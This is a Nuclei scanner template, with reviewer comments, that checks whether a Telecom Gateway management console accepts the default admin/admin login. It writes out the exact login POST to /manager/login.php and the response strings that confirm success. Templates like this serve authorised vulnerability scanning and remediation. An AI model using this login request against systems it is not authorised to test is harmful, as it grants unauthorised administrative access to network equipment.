漏洞描述
Login to the Telecom Gateway management console succeeded with the default admin credentials.
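# Nuclei template: reports a Telecom Gateway management console that still
# accepts its default admin credentials.
# NOTE(review): the trailing `# digest:` comment was produced for the original
# template text; it will no longer match after any edit and must be
# regenerated when the template is re-signed.
id: telecom-gateway-default-login

info:
  name: Telecom Gateway - Default Admin Login
  author: ritikchaddha
  severity: high
  description: Telecom Gateway default admin login credentials were successful.
  # Defender guidance for whoever triages a hit.
  remediation: >-
    Change the default admin password on the gateway management console and
    restrict access to the /manager/ interface to trusted management networks.
  metadata:
    # One credential pair, one request per host.
    max-request: 1
  tags: default-login,telecom,gateway,vuln

http:
  # NOTE(review): the request sends a form-encoded body but no Content-Type
  # header is visible on the page. If the console only parses the body when
  # the header is present, the check would miss affected hosts; confirm
  # against a test device.
  - raw:
      # The blank line separating headers from body is required by HTTP and
      # was lost in the flattened listing.
      - |
        POST /manager/login.php HTTP/1.1
        Host: {{Hostname}}

        Name={{username}}&Pass={{password}}

    # pitchfork pairs the payload lists by position; with one entry in each
    # list exactly one login attempt is made.
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    # Follow at most two same-host redirects so the matchers see the page
    # served after the login POST.
    host-redirects: true
    max-redirects: 2

    # Both matchers must hold for a finding to be reported.
    matchers-condition: and
    matchers:
      # All three strings must be present in the response body.
      # NOTE(review): confirm these strings appear only on the post-login
      # page and not on the login form itself, otherwise any reachable
      # console would be reported regardless of its password.
      - type: word
        part: body
        words:
          - "<title>电信网关服务器管理后台</title>"
          - "index-shang.php"
          - "di.php"
        condition: and

      - type: status
        status:
          - 200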
# digest: 4b0a0048304602210080782655ba38730784d57708d13c57bbf254470dcd2e2704a43d13830a845fea02210096bccdad217b88adfbbe9d97c2d1e0f63bf24db39906a687f5733de57b33c9fc:922c64590222798bb761d5b6d8e72950